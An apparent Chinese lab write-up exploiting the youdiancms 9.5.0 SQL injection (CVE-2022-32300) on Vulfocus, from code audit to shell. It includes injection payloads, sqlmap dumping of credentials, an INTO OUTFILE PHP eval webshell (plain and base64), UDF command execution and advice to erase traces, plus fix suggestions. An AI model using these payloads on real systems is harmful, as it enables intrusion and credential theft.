当前位置：首页 > article >正文

Vulfocus靶场实战：youdiancms 9.5.0 SQL注入漏洞（CVE-2022-32300）从审计到Getshell

article 2026/4/7 20:09:34

1. 环境准备与漏洞背景最近在Vulfocus靶场复现了一个经典案例——youdiancms 9.5.0版本的SQL注入漏洞CVE-2022-32300。这个CMS系统在中小企业网站中还挺常见漏洞利用链完整特别适合新手学习Web渗透的基础操作。我们先从最基础的环境搭建说起。首先在Vulfocus启动靶场后你会看到一个典型的安装界面。数据库配置建议用root/root数据库名填youdian就行。这里有个小细节要注意安装完成后记得删除install.php文件这是很多CMS系统的通病不处理的话容易被恶意利用。安装成功后用默认账号登录后台界面挺简洁的主要功能都在左侧菜单栏。说到这个漏洞的发现过程还挺有意思。官方补丁公告里只说了存在SQL注入风险但没具体说明漏洞点。我在审计源码时发现MailAction.class.php文件里的MailSendID参数直接拼接到SQL语句没有任何过滤处理。这种老式CMS喜欢用字符串拼接的方式构造SQL查询在早期版本中特别常见。2. 漏洞定位与手工验证2.1 源码审计关键点打开/App/Lib/Action/Admin/MailAction.class.php文件找到viewLog方法。你会看到类似这样的危险代码public function viewLog(){ $mailSendID $_GET[MailSendID]; $sql SELECT * FROM mail_log WHERE id.$mailSendID; $result $this-db-query($sql); //...后续处理逻辑 }看到问题了吗开发者直接用了GET参数拼接SQL语句连最基本的引号包裹都没有。这意味着我们可以在MailSendID参数里注入任何SQL代码。漏洞触发点在/index.php/Admin/mail/viewLog这个路由但有个前提——需要先登录后台。2.2 手工注入测试先用Burp Suite抓个正常请求包保存为req.txt。重点观察Cookie里的PHPSESSID和请求参数。我习惯先用简单payload测试比如/index.php/Admin/mail/viewLog?MailSendID1 and 11 /index.php/Admin/mail/viewLog?MailSendID1 and 12第一个请求应该返回正常数据第二个应该返回空内容。如果符合这个表现基本可以确认存在SQL注入。再试试更复杂的payload/index.php/Admin/mail/viewLog?MailSendID1 union select 1,2,3,4,5,6,7,8,9这个操作是为了确定字段数通过不断调整select后面的数字直到页面正常显示。我测试时发现这个表有9个字段其中第4、5个字段会回显在页面上。3. 自动化工具利用3.1 sqlmap基础操作虽然手工验证很有成就感但实战中还是sqlmap效率更高。准备好之前保存的req.txt运行python sqlmap.py -r req.txt --risk3 --level5 --dbs这里risk和level参数都调到最高因为我们需要充分探测漏洞。几分钟后应该能看到数据库列表其中肯定包含youdian这个库。接下来爆表名python sqlmap.py -r req.txt -D youdian --tables重点查看admin、user这类敏感表。我发现了youdian_admin表里面肯定存着管理员凭证。继续爆字段python sqlmap.py -r req.txt -D youdian -T youdian_admin --columns3.2 获取网站路径在写webshell之前我们需要知道网站绝对路径。通过sqlmap的--file-read参数可以尝试读取常见配置文件python sqlmap.py -r req.txt --file-read/var/www/html/config.php不过这个方法成功率不高。更靠谱的是结合目录扫描比如用dirsearch发现根目录存在install.php结合报错信息可以确定路径是/var/www/wordpress。记住这个路径后面写shell要用。4. 权限提升与Getshell4.1 写入Webshell有了路径信息最直接的利用方式就是通过SQL注入写文件。在sqlmap的sql-shell中执行SELECT ?php eval($_POST[cmd]);? INTO OUTFILE /var/www/wordpress/shell.php但这里有个坑MySQL用户可能没有写权限。如果遇到这种情况可以尝试写日志文件或者临时目录。我常用的备用方案是SELECT ?php file_put_contents(shell.php,base64_decode(PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4));? INTO OUTFILE /var/www/wordpress/tmp.php4.2 数据库提权如果写文件失败可以考虑从数据库用户入手。先用sqlmap爆用户密码python sqlmap.py -r req.txt --users python sqlmap.py -r req.txt --passwords如果运气好拿到root密码可以直接连接MySQL进行操作。比如创建新用户、修改现有用户密码等。我遇到过一次案例通过mysql的UDF函数直接执行系统命令比写webshell还方便。4.3 获取flag最后一步就是常规操作了。用蚁剑连接写好的webshell在根目录或者/home下找flag文件。Vulfocus的flag通常格式为flag-{UUID}可以用find命令快速定位find / -name flag* 2/dev/null找到flag后记得清理痕迹删除webshell和临时文件。实战中还要注意不要影响业务正常运行这是基本的职业道德。5. 漏洞修复建议虽然这是个靶场演练但还是要说说修复方案。开发者应该做三件事使用预处理语句重构所有SQL查询对MailSendID参数做强制类型转换intval增加后台操作的权限校验对于使用这类CMS的站长建议立即升级到最新版本。如果暂时不能升级可以在WAF中添加针对MailSendID参数的特殊字符过滤规则。

Vulfocus靶场实战：youdiancms 9.5.0 SQL注入漏洞（CVE-2022-32300）从审计到Getshell

相关文章：

Vulfocus靶场实战：youdiancms 9.5.0 SQL注入漏洞（CVE-2022-32300）从审计到Getshell

WechatRealFriends：微信虚假好友检测工具，让社交关系更透明

手把手教你用Burp Suite搞定PortSwigger Labs的CSRF靶场（附12个Lab实战POC）

数字记忆守护者：GetQzonehistory实现QQ空间数据本地备份全攻略

径向基RBF神经网络的故障分类与故障诊断的Matlab程序代码

从一张手机照片到4K电影：图解‘位深度’和‘图像大小’是怎么算出来的

告别手写诊断协议！用Canoe的Osek_Tp.dll库，5分钟搞定CAN/CANFD的TP层测试脚本

STM32F4项目实战：用INA219给锂电池做个“智能管家”（附完整代码）

Druid监控页面登录失败？你可能踩了这个Request Body的坑

基于Django REST framework的共享充电桩后台管理系统架构设计与实现

算法岗面试避坑指南：从运动控制到ROS实战的思维跃迁

C++20模块在边缘端编译失败的真相：MSVC/Clang/GCC三大工具链兼容性断层图谱（含实测数据表）

《算法题讲解指南：优选算法-字符串》--61.最长公共前缀，62.最长回文子串，63.二进制求和，64.字符串相乘

为什么你的STL allocator在期货做市系统中突然OOM？——穿透式内存池测试报告（含ASan+Valgrind+自研HeapSpy三重校验）

【快速EI检索 | SPIE出版】2026年量子计算与人工智能国际学术会议（ICQCAI 2026）

Visual C++运行库一站式解决方案：从依赖问题到高效部署

WPF调试神器：如何在GUI应用中优雅地输出Console日志（附完整代码）

【Agent】大模型在线API接入基础入门

Wan2.2-I2V-A14B企业级应用：私有化部署保障数据安全与合规

CAPL不只是写脚本：揭秘它在整车V流程中的五大实战角色（仿真/测试/诊断）

simulink和carsim联合仿真的mpc轨迹跟踪模型。

SEO 优化者如何提高网站的转化率

Carsim+Simulink 线控制动系统BBW-EMB联合仿真模型！BBW-EMB线控制动联合仿真｜Carsim+Simulink】

CefFlashBrowser：Flash内容现代化解决方案与完整应用指南

3步实现Android Studio全界面汉化：让开发者效率提升40%的中文语言包方案

基于拉丁超立方采样的电力系统概率潮流计算实现分析

混合储能系统容量优化配置中的信号分解与容量分配算法解析

磁链观测器在VESC中使用的方法：实现0速闭环启动的工程实践与代码文档仿真对应

Windows Android兼容环境部署指南：跨平台运行的技术实现与实践

音频频谱分析师的成长之路：Spek实战秘籍深度解锁